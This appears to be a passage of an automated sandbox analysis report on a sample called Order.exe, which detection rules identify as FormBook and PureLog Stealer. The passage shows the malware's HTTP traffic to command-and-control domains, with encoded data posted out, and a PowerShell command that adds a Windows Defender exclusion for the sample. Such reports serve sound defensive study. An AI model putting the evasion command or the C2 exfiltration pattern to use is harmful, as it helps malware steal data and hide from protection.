                                                                                                                                  Data Ascii: kf-HBx=uqt03LPwgzKGSUtk6ek7JLgRP8qzR+HK6Mk2DQw4uCRiDjPPivFOAuayi/SHOZM2ITUIyBw3/Ndodqlm/cp42zxhtDNHSF/LtQgIP31xIMGYqGImH6esDKzLK2Gygc260B3U7ZYCmNSnyuLc7gwhPtxJQXvLKbvcyTYZsjjVfr35YbdGzW2hlwQrLx9icJLSbA/RufJ+yFTuBZFF+WaRDXvkNzVdQPP8Q4eH4xPNhlFv7CIwmAUqpPUbyd7doV/OHg5cincf8xd/IFAY/8WSk6/vVBQmR/t0Hun2ZF+sHc8yTuzOJrOatKiL2vQLalpE0Sf9N7mGkjs6M/yOIjhHOm1i5/PfsJq2KFqWL66C5KMUNfqYXRK+B86ruAk5Vom5doEHo2BUEQUd0NpCZUSUlfQyLM1Qfygvgwy6GsDm5VQfRcUDfvPuc/AS3QhT/T+OiBYigfixkL63qmGDY54j2Ps5BFwY4mAiQPtTmwFamnUGS9DiiZYqFrxIQVOX+fMudxhC5ZCnRkqDmoPmZUHEV4g2z3bFrnFfgPbtpgFzc+eyFqkqc05yhX4DmvRHdFmHJ5MrPvEcbw7oXdv4tYxErgZYx2mUWzmBOMoL3bx6hFksirK2MKqBZsSi0929yvsoG2G/h3X69kkyCPw9dwIBt7eXtdTKDU8D/U3i1WWB3/6oP793FZ/3LG1E/0hoix4aLlqnkyfdFh1Tm4m6dXH/SOminerRBst+sC6BEihaK03JYq0B9J7TbQmBCFF8Brjz2hU7lqtmxaC+dDFggPmZPmhY6fUlk15kG4KShD7ycLjXw/lsUJG5QkPhdT769KvaZDAU3JJOP5dXUpJymzr30nHx3SES3LWkGnbPmpIP7CHZh7sNEFlViPOLrbPs8KmSmubXPfwQpVi+2G60U0jTG+moX7mUCaKi14hd7zXqf+fHgHgb7KZQe1TTzYskDBOdBepuJWqDXfzeswG7XspD9JVLmf1sf6ZNe56aEimbh7spu [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  48192.168.2.450055172.81.61.224801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:50.909794092 CEST524OUTGET /d5je/?oFA=_z5x9B5&kf-HBx=joFU07nwohD6eVoe3rFlartiOObsWeCn1fIADxIG1iVHGQ+b2sFWG9fhj6bDMdYTFTYIwFceucpsU6xb3PR2iChOsBNMIjf68Qc2WylAI6LhtEtoF9GlVuo= HTTP/1.1
                                                                                                                                  Host: www.moritynomxd.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  49192.168.2.4500563.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:56.458575964 CEST790OUTPOST /h8b0/ HTTP/1.1
                                                                                                                                  Host: www.tukaari.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.tukaari.shop
                                                                                                                                  Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 4f 54 6b 2b 7a 6d 4c 30 32 46 68 42 59 49 55 4b 2b 76 50 6b 6b 39 31 5a 54 70 75 34 47 62 58 56 30 44 55 34 4c 73 4b 69 57 4f 49 64 73 54 30 48 65 6a 75 69 62 72 50 4f 30 55 66 59 57 4e 37 72 4e 48 5a 36 72 35 30 66 63 62 35 63 73 67 2b 31 31 2b 62 69 32 54 68 58 6b 76 4f 4e 4c 68 51 64 78 69 49 78 36 46 63 4c 4b 79 66 62 6f 37 76 61 4b 76 50 42 61 32 45 53 39 56 4c 51 6d 69 7a 73 63 73 55 53 47 51 55 39 33 61 4c 66 79 72 51 36 4e 31 38 39 34 38 6d 35 44 37 6d 61 45 4a 7a 5a 76 41 73 32 6c 76 67 4a 4c 35 2f 6e 2b 51 52 41 4b 47 7a 59 2b 79 62 36 78 62 48 54 77 68 69 74 4e 67 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=OTk+zmL02FhBYIUK+vPkk91ZTpu4GbXV0DU4LsKiWOIdsT0HejuibrPO0UfYWN7rNHZ6r50fcb5csg+11+bi2ThXkvONLhQdxiIx6FcLKyfbo7vaKvPBa2ES9VLQmizscsUSGQU93aLfyrQ6N18948m5D7maEJzZvAs2lvgJL5/n+QRAKGzY+yb6xbHTwhitNg==


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  50192.168.2.4500573.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:59.002609015 CEST810OUTPOST /h8b0/ HTTP/1.1
                                                                                                                                  Host: www.tukaari.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.tukaari.shop
                                                                                                                                  Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 4f 54 6b 2b 7a 6d 4c 30 32 46 68 42 4b 37 4d 4b 38 4d 6e 6b 6a 64 31 59 63 4a 75 34 54 4c 58 52 30 45 63 34 4c 74 66 36 56 38 63 64 73 79 6f 48 66 6d 53 69 63 72 50 4f 2f 30 66 6e 62 74 37 61 4e 48 55 48 72 37 51 66 63 59 46 63 73 6c 53 31 30 4e 7a 68 77 44 68 56 78 66 4f 54 47 42 51 64 78 69 49 78 36 47 67 78 4b 79 6e 62 6f 75 6e 61 59 39 33 47 5a 32 45 56 36 56 4c 51 73 43 7a 67 63 73 55 77 47 56 4e 57 33 63 48 66 79 71 67 36 4e 6b 38 38 74 73 6d 33 48 37 6e 7a 46 62 72 4a 72 54 64 56 69 39 73 31 45 34 4c 4d 79 32 41 61 62 33 53 50 73 79 2f 4a 73 63 4f 6e 39 69 66 6b 57 72 6d 6c 30 59 47 78 63 48 4a 46 64 52 76 68 79 53 33 69 66 48 6f 3d
                                                                                                                                  Data Ascii: kf-HBx=OTk+zmL02FhBK7MK8Mnkjd1YcJu4TLXR0Ec4Ltf6V8cdsyoHfmSicrPO/0fnbt7aNHUHr7QfcYFcslS10NzhwDhVxfOTGBQdxiIx6GgxKynbounaY93GZ2EV6VLQsCzgcsUwGVNW3cHfyqg6Nk88tsm3H7nzFbrJrTdVi9s1E4LMy2Aab3SPsy/JscOn9ifkWrml0YGxcHJFdRvhyS3ifHo=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  51192.168.2.4500583.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:05:01.549972057 CEST10892OUTPOST /h8b0/ HTTP/1.1
                                                                                                                                  Host: www.tukaari.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.tukaari.shop
                                                                                                                                  Referer: http://www.tukaari.shop/h8b0/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 4f 54 6b 2b 7a 6d 4c 30 32 46 68 42 4b 37 4d 4b 38 4d 6e 6b 6a 64 31 59 63 4a 75 34 54 4c 58 52 30 45 63 34 4c 74 66 36 56 38 45 64 73 67 67 48 65 42 47 69 64 72 50 4f 77 6b 66 6d 62 74 37 44 4e 44 77 4c 72 37 74 6f 63 65 42 63 71 33 61 31 6c 4d 7a 68 35 44 68 56 7a 66 4f 4f 4c 68 51 79 78 68 77 31 36 46 49 78 4b 79 6e 62 6f 70 58 61 49 66 50 47 55 57 45 53 39 56 4b 52 6d 69 7a 4d 63 6f 41 4b 47 56 41 74 30 73 6e 66 79 4b 77 36 50 57 55 38 73 4d 6d 31 4b 62 6e 72 46 62 57 4f 72 54 52 6a 69 38 59 62 45 34 2f 4d 6a 52 35 34 41 33 4f 72 2b 69 6a 30 2b 4f 43 66 38 41 50 53 59 63 53 45 79 62 53 32 4b 6e 30 75 47 41 57 65 76 48 76 39 42 78 6b 70 54 67 37 37 49 41 42 59 73 6e 68 44 4c 42 55 70 6d 33 55 69 35 43 78 4c 79 74 68 76 44 32 69 4b 79 64 52 78 66 4b 61 4c 42 36 61 4d 35 75 32 74 6f 34 56 71 4f 74 41 45 31 6f 68 76 55 49 43 7a 67 69 64 44 39 6d 41 6f 66 58 78 6c 4c 47 71 6e 52 6b 42 75 58 71 61 69 7a 53 75 64 45 4a 7a 49 46 35 77 42 37 48 69 5a 64 71 6d 5a 38 37 74 62 41 4d 35 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=OTk+zmL02FhBK7MK8Mnkjd1YcJu4TLXR0Ec4Ltf6V8EdsggHeBGidrPOwkfmbt7DNDwLr7toceBcq3a1lMzh5DhVzfOOLhQyxhw16FIxKynbopXaIfPGUWES9VKRmizMcoAKGVAt0snfyKw6PWU8sMm1KbnrFbWOrTRji8YbE4/MjR54A3Or+ij0+OCf8APSYcSEybS2Kn0uGAWevHv9BxkpTg77IABYsnhDLBUpm3Ui5CxLythvD2iKydRxfKaLB6aM5u2to4VqOtAE1ohvUICzgidD9mAofXxlLGqnRkBuXqaizSudEJzIF5wB7HiZdqmZ87tbAM5dzo9sWW2mLBEAhwFo4GzhzIqkZ9ZvgIlWBg4DlU5ohRwPQfLm9ckKPjzm5QiSvIs98jgtZuiFf2SeioWyfrLzmqrGE+mqBaarEU18vzqHucIejOSXxM9t2A2mAvUt+ZS2J06442vwvzg5rpMaIAybOGZYJvAcnaJ7CdpbYAq/OURI08xA3MyMYTQymjcZdBJWhAKhtbCt9T+n79358zxzYvNFa4qDToyaOXlMtYG5GqlTN4jXxhEDetazPE+uCy+thoozUDT5KK49tUB8bvcPUAUUYBNN5ZoSqBg867liu7suqvHgotf4X2JVXM435AFdG78cxKrKn9cg9W+qWB5TSDx0at1Ne4MII/39QLauUH25+Kq/1zlmBTOeVub3t71Ibi+WOdd+DMoLzn8KyyWvVSQbfVAAmgh7FxT/iUfHtHS7QuHDVM3XRR7QokbU3plm9QaJyBDxLbrgLJrVc0PrDsuKOTnCmwf7S09ROgy0GL+rsbAWQs6u2kWeRHAnvDMRo/ZMydGS5vm1Bu0DvmTCHJ2RiXw6T4BR906gTGxShw92j3ri1WtQgn9w9jYGPpridfSgh1A99aevUfXcf+MJGUjZY4Q8QHm+MxKNhV9tDyTqxKxoymtQjQsVtsQE7hsZs+LsHIuooj7Xm4/KNSsqS5blSXgU/u83F [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  52192.168.2.4500593.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:05:04.308687925 CEST521OUTGET /h8b0/?kf-HBx=DRMewQ2K/nAxApdAjdq/8MBaTrmuK5PhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpjQD4u+ERF0y3CIErlIFDiiN/rGNNtD3azo=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.tukaari.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:05:04.937974930 CEST394INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:05:04 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 254
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6b 66 2d 48 42 78 3d 44 52 4d 65 77 51 32 4b 2f 6e 41 78 41 70 64 41 6a 64 71 2f 38 4d 42 61 54 72 6d 75 4b 35 50 68 6a 41 74 6c 44 75 7a 39 53 63 59 65 39 54 64 4b 63 7a 79 48 54 6f 4b 6c 2f 6e 58 77 55 70 37 35 43 54 78 64 74 4d 52 6d 4a 62 46 44 7a 6c 36 4d 36 76 6e 64 70 6a 51 44 34 75 2b 45 52 46 30 79 33 43 49 45 72 6c 49 46 44 69 69 4e 2f 72 47 4e 4e 74 44 33 61 7a 6f 3d 26 6f 46 41 3d 5f 7a 35 78 39 42 35 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?kf-HBx=DRMewQ2K/nAxApdAjdq/8MBaTrmuK5PhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpjQD4u+ERF0y3CIErlIFDiiN/rGNNtD3azo=&oFA=_z5x9B5"}</script></head></html>


                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:02:00:57
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Users\user\Desktop\Order.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Order.exe"
                                                                                                                                  Imagebase:0x530000
                                                                                                                                  File size:814'592 bytes
                                                                                                                                  MD5 hash:879BFDCA45455CFE5B122B8AD287B393
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1745771597.0000000005130000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1740687497.0000000003A39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:02:01:03
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"
                                                                                                                                  Imagebase:0xfe0000
                                                                                                                                  File size:433'152 bytes
                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:02:01:03
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:02:01:03
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Users\user\Desktop\Order.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Order.exe"
                                                                                                                                  Imagebase:0x150000
                                                                                                                                  File size:814'592 bytes
                                                                                                                                  MD5 hash:879BFDCA45455CFE5B122B8AD287B393
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:02:01:03
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Users\user\Desktop\Order.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Order.exe"
                                                                                                                                  Imagebase:0xea0000
                                                                                                                                  File size:814'592 bytes
                                                                                                                                  MD5 hash:879BFDCA45455CFE5B122B8AD287B393
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:02:01:06
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                                  File size:496'640 bytes
                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:02:01:12
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe"
                                                                                                                                  Imagebase:0x7d0000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:02:01:14
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\SysWOW64\mshta.exe"
                                                                                                                                  Imagebase:0xfb0000
                                                                                                                                  File size:13'312 bytes
                                                                                                                                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:moderate
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:02:01:20
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                  File size:862'208 bytes
                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:02:01:27
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe"
                                                                                                                                  Imagebase:0x7d0000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:13
                                                                                                                                  Start time:02:01:40
                                                                                                                                  Start date:24/10/2024
                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                  Imagebase:0x7ff6bf500000
                                                                                                                                  File size:676'768 bytes
                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Disassembly

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:10.1%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:14.3%
                                                                                                                                    Total number of Nodes:203
                                                                                                                                    Total number of Limit Nodes:15
